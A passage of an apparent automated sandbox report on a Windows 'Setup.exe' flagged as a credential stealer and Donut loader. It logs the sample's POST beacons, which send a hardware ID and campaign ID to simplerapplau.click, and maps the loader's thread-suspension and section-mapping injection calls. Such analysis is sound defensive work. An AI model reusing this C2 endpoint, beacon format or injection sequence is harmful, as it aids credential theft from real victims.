                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=18723&min_rtt=1787&rtt_var=10846&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21337&delivery_rate=1634023&cwnd=221&unsent_bytes=0&cid=d2c74ab75c546539&ts=4504&x=0"
                                                                                                                      2024-12-18 17:30:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2024-12-18 17:30:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.749795104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:30:03 UTC278OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=SK7ROEO9QI62
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 1185
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:30:03 UTC1185OUTData Raw: 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43
                                                                                                                      Data Ascii: --SK7ROEO9QI62Content-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--SK7ROEO9QI62Content-Disposition: form-data; name="pid"1--SK7ROEO9QI62Content-Disposition: form-data; name="lid"hRjzG3--VIKA--SK7ROEO9QI62C
                                                                                                                      2024-12-18 17:30:08 UTC1046INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:30:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=v82osa18e87cn9sm2d1mq6mid9; expires=Sun, 13-Apr-2025 11:16:43 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLTiD5EIw%2Fkkk9fkXcXbH%2B5ufHHjqlCGc3%2Be2u6jC6G7AX%2FhKeonv6YSpbsef8yJayK9PgCX64CY1Iq61wsJPrcrzNM1GyfYF9K8rtJmWdATvEc9M7kY%2Flcbh1RopP%2F%2FLnnwKuvU"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e0ebddf31a34-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2228&min_rtt=2067&rtt_var=890&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2099&delivery_rate=1412675&cwnd=185&unsent_bytes=0&cid=68cb2f70872251e6&ts=4771&x=0"
                                                                                                                      2024-12-18 17:30:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2024-12-18 17:30:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.749805104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:30:09 UTC284OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=SFZ7MPLOIWOP2ZQLAC
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 1114
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:30:09 UTC1114OUTData Raw: 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d
                                                                                                                      Data Ascii: --SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="pid"1--SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="lid"hRjzG3--VIKA
                                                                                                                      2024-12-18 17:30:13 UTC1040INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:30:13 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=sot6m6f8muuc1cpko1s02lo2f7; expires=Sun, 13-Apr-2025 11:16:51 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMMoMmk3BctgWOB7JW%2BuqzCoHe%2F4qbYZm5X8hkxkrHvT6Akx438om4iEpZ1NymaJ5K%2FLegzg3l58ZU9JnHh43z3wYNbO9felCT9MfumdScGo0p%2Bu7exjIPtZs4pdJ4uAIWOIgZkM"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e1120e738c23-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1864&rtt_var=716&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2034&delivery_rate=1509043&cwnd=227&unsent_bytes=0&cid=11d916eca91a89e0&ts=4511&x=0"
                                                                                                                      2024-12-18 17:30:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                      2024-12-18 17:30:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Target ID:0
                                                                                                                      Start time:12:29:14
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:10'190'992 bytes
                                                                                                                      MD5 hash:8AF6DB9955ABED6390BC281E0430DDC3
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:41.5%
                                                                                                                        Total number of Nodes:118
                                                                                                                        Total number of Limit Nodes:11
                                                                                                                        execution_graph 13711 2c002d5 13712 2c002e3 13711->13712 13727 2c00c25 13712->13727 13714 2c0086e 13715 2c0047b GetPEB 13717 2c004f8 13715->13717 13716 2c00436 13716->13714 13716->13715 13730 2c009e5 13717->13730 13720 2c00559 CreateThread 13721 2c00531 13720->13721 13743 2c00895 GetPEB 13720->13743 13726 2c00769 13721->13726 13739 2c00ee5 GetPEB 13721->13739 13723 2c00859 TerminateProcess 13723->13714 13724 2c009e5 5 API calls 13724->13726 13726->13723 13728 2c00c32 13727->13728 13741 2c00c45 GetPEB 13727->13741 13728->13716 13731 2c009fb CreateToolhelp32Snapshot 13730->13731 13733 2c0052b 13731->13733 13734 2c00a32 Thread32First 13731->13734 13733->13720 13733->13721 13735 2c00a59 13734->13735 13736 2c00aee CloseHandle 13734->13736 13735->13736 13737 2c00a90 Wow64SuspendThread 13735->13737 13738 2c00aba CloseHandle 13735->13738 13736->13733 13737->13738 13738->13735 13740 2c005b3 13739->13740 13740->13724 13740->13726 13742 2c00c60 13741->13742 13742->13728 13744 2c008ee 13743->13744 13745 2c0099b 13744->13745 13746 2c0094e CreateThread 13744->13746 13746->13744 13747 2c010c5 13746->13747 13750 2c4ac8a 13747->13750 13751 2c4acaf 13750->13751 13752 2c4ad99 13750->13752 13786 2c4d50c 13751->13786 13762 2c4bf65 13752->13762 13755 2c4acc7 13756 2c4d50c LoadLibraryA 13755->13756 13761 2c010ca 13755->13761 13757 2c4ad09 13756->13757 13758 2c4d50c LoadLibraryA 13757->13758 13759 2c4ad25 13758->13759 13760 2c4d50c LoadLibraryA 13759->13760 13760->13761 13763 2c4d50c LoadLibraryA 13762->13763 13764 2c4bf88 13763->13764 13765 2c4d50c LoadLibraryA 13764->13765 13766 2c4bfa0 13765->13766 13767 2c4d50c LoadLibraryA 13766->13767 13768 2c4bfbe 13767->13768 13769 2c4bfd3 VirtualAlloc 13768->13769 13778 2c4bfe7 13768->13778 13771 2c4c001 13769->13771 13769->13778 13770 2c4d50c LoadLibraryA 13772 2c4c07f 13770->13772 13771->13770 13784 2c4c25a 13771->13784 13775 2c4c0d5 13772->13775 13772->13778 13790 2c4d313 13772->13790 13773 2c4d50c LoadLibraryA 13773->13775 13775->13773 13777 2c4c137 13775->13777 13775->13784 13776 2c4c318 VirtualFree 13776->13778 13777->13784 13785 2c4c199 13777->13785 13818 2c4b0f5 13777->13818 13778->13761 13780 2c4c182 13780->13784 13825 2c4b1f0 13780->13825 13783 2c4c2b7 13783->13783 13784->13776 13784->13783 13785->13784 13794 2c4c695 13785->13794 13787 2c4d523 13786->13787 13788 2c4d54a 13787->13788 13844 2c4b611 13787->13844 13788->13755 13791 2c4d328 13790->13791 13792 2c4d39e LoadLibraryA 13791->13792 13793 2c4d3a8 13791->13793 13792->13793 13793->13772 13795 2c4c6d0 13794->13795 13796 2c4c717 NtCreateSection 13795->13796 13797 2c4c73c 13795->13797 13809 2c4cd44 13795->13809 13796->13797 13796->13809 13798 2c4c7d1 NtMapViewOfSection 13797->13798 13797->13809 13808 2c4c7f1 13798->13808 13799 2c4cb1a VirtualAlloc 13803 2c4cb5c 13799->13803 13800 2c4d313 LoadLibraryA 13800->13808 13801 2c4d313 LoadLibraryA 13806 2c4ca78 13801->13806 13802 2c4cc0d VirtualProtect 13804 2c4ccd8 VirtualProtect 13802->13804 13814 2c4cc2d 13802->13814 13803->13802 13803->13809 13816 2c4cbfa NtMapViewOfSection 13803->13816 13811 2c4cd07 13804->13811 13805 2c4cb16 13805->13799 13806->13799 13806->13801 13806->13805 13830 2c4d3b1 13806->13830 13807 2c4d3b1 LoadLibraryA 13807->13808 13808->13800 13808->13806 13808->13807 13808->13809 13809->13784 13810 2c4ce52 13810->13809 13812 2c4ce5a CreateThread 13810->13812 13811->13809 13811->13810 13834 2c4d0c6 13811->13834 13812->13809 13814->13804 13817 2c4ccb2 VirtualProtect 13814->13817 13816->13802 13816->13809 13817->13814 13819 2c4d313 LoadLibraryA 13818->13819 13820 2c4b109 13819->13820 13821 2c4d3b1 LoadLibraryA 13820->13821 13824 2c4b111 13820->13824 13822 2c4b129 13821->13822 13823 2c4d3b1 LoadLibraryA 13822->13823 13822->13824 13823->13824 13824->13780 13826 2c4d313 LoadLibraryA 13825->13826 13827 2c4b206 13826->13827 13828 2c4d3b1 LoadLibraryA 13827->13828 13829 2c4b216 13828->13829 13829->13785 13831 2c4d3cc 13830->13831 13833 2c4d4e2 13830->13833 13831->13833 13838 2c4b7b6 13831->13838 13833->13806 13837 2c4d0ee 13834->13837 13835 2c4d2e0 13835->13810 13836 2c4d3b1 LoadLibraryA 13836->13837 13837->13835 13837->13836 13839 2c4b7fb 13838->13839 13842 2c4b7d5 13838->13842 13840 2c4d313 LoadLibraryA 13839->13840 13841 2c4b808 13839->13841 13840->13841 13841->13833 13842->13839 13842->13841 13843 2c4d3b1 LoadLibraryA 13842->13843 13843->13842 13845 2c4b716 13844->13845 13846 2c4b631 13844->13846 13845->13787 13846->13845 13847 2c4b7b6 LoadLibraryA 13846->13847 13847->13845
                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02C4C72E
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000), ref: 02C4C7D6
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C4CB4A
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02C4CBFF
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02C4CC1C
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02C4CCBF
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02C4CCF2
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02C4CE63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1248616170-0
                                                                                                                        • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction ID: d3d332f2c5b15fa75c51ca6ab07cc2fb75e87ff43d1fbfa2fc283afa78cf78ac
                                                                                                                        • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction Fuzzy Hash: B0429C72609341AFD724DF25C844B6BBBE9EFC8714F04492EF9859B261DB30EA41CB91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 187 2c009e5-2c00a2c CreateToolhelp32Snapshot 190 2c00b02-2c00b05 187->190 191 2c00a32-2c00a53 Thread32First 187->191 192 2c00a59-2c00a5f 191->192 193 2c00aee-2c00b00 CloseHandle 191->193 194 2c00a61-2c00a67 192->194 195 2c00ace-2c00ae8 192->195 193->190 194->195 196 2c00a69-2c00a88 194->196 195->192 195->193 196->195 199 2c00a8a-2c00a8e 196->199 200 2c00a90-2c00aa4 Wow64SuspendThread 199->200 201 2c00aa6-2c00ab5 199->201 202 2c00aba-2c00acc CloseHandle 200->202 201->202 202->195
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02C0052B,?,00000001,?,81EC8B55,000000FF), ref: 02C00A23
                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 02C00A4F
                                                                                                                        • Wow64SuspendThread.KERNEL32(00000000), ref: 02C00AA2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C00ACC
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C00B00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2720937676-0
                                                                                                                        • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                        • Instruction ID: 74d7b9bd41cb83ec5a42ba35a9e95c44b92e8b1031ded1e1d75b024661b7c214
                                                                                                                        • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                        • Instruction Fuzzy Hash: 7A41F971A00108AFDB18DF99C890FADB7B6EFC8300F118168E6159B7E4DB34AE45CB94

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 203 2c00895-2c008ec GetPEB 204 2c008f7-2c008fb 203->204 205 2c00901-2c0090c 204->205 206 2c0099b-2c009a2 204->206 207 2c00912-2c00929 205->207 208 2c00996 205->208 209 2c009ad-2c009b1 206->209 212 2c0092b-2c0094c 207->212 213 2c0094e-2c00966 CreateThread 207->213 208->204 210 2c009c2-2c009c9 209->210 211 2c009b3-2c009c0 209->211 216 2c009d2-2c009d7 210->216 217 2c009cb-2c009cd 210->217 211->209 218 2c0096a-2c00972 212->218 213->218 217->216 218->208 220 2c00974-2c00991 218->220 220->208
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02C00961
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 2422867632-3772416878
                                                                                                                        • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                        • Instruction ID: 0d368fd6b565fdc37c85c4622b32c796ba2c64d188daa8e72ad9d06f2660d1bc
                                                                                                                        • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                        • Instruction Fuzzy Hash: 6441B274E00209EFDB14CF98C994BAEB7B1BF88314F218198D515AB385C775AE81CF94

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 239 2c002d5-2c0043d call 2c00885 call 2c00e85 call 2c01035 call 2c00c25 248 2c00443-2c0044a 239->248 249 2c0086e-2c00871 239->249 250 2c00455-2c00459 248->250 251 2c0047b-2c004f6 GetPEB 250->251 252 2c0045b-2c00479 call 2c00da5 250->252 254 2c00501-2c00505 251->254 252->250 256 2c00507-2c0051b 254->256 257 2c0051d-2c0052f call 2c009e5 254->257 256->254 262 2c00531-2c00557 257->262 263 2c00559-2c0057a CreateThread 257->263 264 2c0057d-2c00581 262->264 263->264 266 2c00842-2c0086c TerminateProcess 264->266 267 2c00587-2c005ba call 2c00ee5 264->267 266->249 267->266 271 2c005c0-2c0060f 267->271 273 2c0061a-2c00620 271->273 274 2c00622-2c00628 273->274 275 2c00668-2c0066c 273->275 278 2c0062a-2c00639 274->278 279 2c0063b-2c0063f 274->279 276 2c00672-2c0067f 275->276 277 2c0073a-2c0082d call 2c009e5 call 2c00885 call 2c00e85 275->277 282 2c0068a-2c00690 276->282 305 2c00832-2c0083c 277->305 306 2c0082f 277->306 278->279 280 2c00641-2c0064f 279->280 281 2c00666 279->281 280->281 283 2c00651-2c00663 280->283 281->273 286 2c006c0-2c006c3 282->286 287 2c00692-2c006a0 282->287 283->281 291 2c006c6-2c006cd 286->291 289 2c006a2-2c006b1 287->289 290 2c006be 287->290 289->290 293 2c006b3-2c006bc 289->293 290->282 291->277 295 2c006cf-2c006d8 291->295 293->286 295->277 297 2c006da-2c006ea 295->297 298 2c006f5-2c00701 297->298 300 2c00732-2c00738 298->300 301 2c00703-2c00730 298->301 300->291 301->298 305->266 306->305
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02C00578
                                                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02C0086C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcessTerminateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1197810419-0
                                                                                                                        • Opcode ID: 0db4d38b37e0ea16a8392408f834227dd665079b62c85feb7516eb92d191e70a
                                                                                                                        • Instruction ID: cd03ccf70043d7035b610d41b2156047191ba8ec1d52327cbbff603c714e8da3
                                                                                                                        • Opcode Fuzzy Hash: 0db4d38b37e0ea16a8392408f834227dd665079b62c85feb7516eb92d191e70a
                                                                                                                        • Instruction Fuzzy Hash: 0C12B0B5E00219DFDB14CF98C990BADBBB2FF88304F2582A9D515AB385C735AA41CF54

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 222 2c4d313-2c4d326 223 2c4d33e-2c4d348 222->223 224 2c4d328-2c4d32b 222->224 226 2c4d357-2c4d363 223->226 227 2c4d34a-2c4d352 223->227 225 2c4d32d-2c4d330 224->225 225->223 229 2c4d332-2c4d33c 225->229 228 2c4d366-2c4d36b 226->228 227->226 230 2c4d36d-2c4d378 228->230 231 2c4d39e-2c4d3a5 LoadLibraryA 228->231 229->223 229->225 232 2c4d394-2c4d398 230->232 233 2c4d37a-2c4d392 call 2c4d9e1 230->233 234 2c4d3a8-2c4d3ac 231->234 232->228 236 2c4d39a-2c4d39c 232->236 233->232 238 2c4d3ad-2c4d3af 233->238 236->231 236->234 238->234
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02C4D3A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: .dll
                                                                                                                        • API String ID: 1029625771-2738580789
                                                                                                                        • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                        • Instruction ID: 333e4f37bf11ecd2112fbc81d6b342417e6d11529412d17980defac4c04f05ef
                                                                                                                        • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                        • Instruction Fuzzy Hash: 9321E4716002858FDB21EF68C844B6FBBB4AF41228F0841ACD80B9BB41DB30E945CB40

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 307 2c4bf65-2c4bfc9 call 2c4d50c * 3 314 2c4bff3 307->314 315 2c4bfcb-2c4bfcd 307->315 316 2c4bff6-2c4c000 314->316 315->314 317 2c4bfcf-2c4bfd1 315->317 317->314 318 2c4bfd3-2c4bfe5 VirtualAlloc 317->318 319 2c4bfe7-2c4bfee 318->319 320 2c4c001-2c4c024 call 2c4d981 call 2c4d9a5 318->320 319->314 322 2c4bff0 319->322 326 2c4c026-2c4c05c call 2c4d679 call 2c4d54f 320->326 327 2c4c06e-2c4c087 call 2c4d50c 320->327 322->314 338 2c4c062-2c4c068 326->338 339 2c4c2bd-2c4c2c6 326->339 327->314 332 2c4c08d 327->332 334 2c4c093-2c4c099 332->334 336 2c4c0d5-2c4c0de 334->336 337 2c4c09b-2c4c0a1 334->337 341 2c4c137-2c4c142 336->341 342 2c4c0e0-2c4c0e6 336->342 340 2c4c0a3-2c4c0a6 337->340 338->327 338->339 343 2c4c2cd-2c4c2d5 339->343 344 2c4c2c8-2c4c2cb 339->344 347 2c4c0a8-2c4c0ad 340->347 348 2c4c0ba-2c4c0bc 340->348 345 2c4c144-2c4c14d call 2c4b259 341->345 346 2c4c15b-2c4c15e 341->346 349 2c4c0ea-2c4c105 call 2c4d50c 342->349 350 2c4c304 343->350 351 2c4c2d7-2c4c302 call 2c4d9a5 343->351 344->343 344->350 358 2c4c2b9 345->358 369 2c4c153-2c4c159 345->369 357 2c4c164-2c4c16d 346->357 346->358 347->348 355 2c4c0af-2c4c0b8 347->355 348->336 356 2c4c0be-2c4c0cc call 2c4d313 348->356 367 2c4c124-2c4c135 349->367 368 2c4c107-2c4c10f 349->368 354 2c4c308-2c4c328 call 2c4d9a5 VirtualFree 350->354 351->354 378 2c4c32e-2c4c330 354->378 379 2c4c32a 354->379 355->340 355->348 371 2c4c0d1-2c4c0d3 356->371 364 2c4c173-2c4c17a 357->364 365 2c4c16f 357->365 358->339 372 2c4c17c-2c4c185 call 2c4b0f5 364->372 373 2c4c1aa-2c4c1ae 364->373 365->364 367->341 367->349 368->358 374 2c4c115-2c4c11e 368->374 369->364 371->334 387 2c4c187-2c4c18d 372->387 388 2c4c193-2c4c19c call 2c4b1f0 372->388 376 2c4c1b4-2c4c1d6 373->376 377 2c4c250-2c4c253 373->377 374->358 374->367 376->358 393 2c4c1dc-2c4c1ef call 2c4d981 376->393 381 2c4c2a5-2c4c2a7 call 2c4c695 377->381 382 2c4c255-2c4c258 377->382 378->316 379->378 392 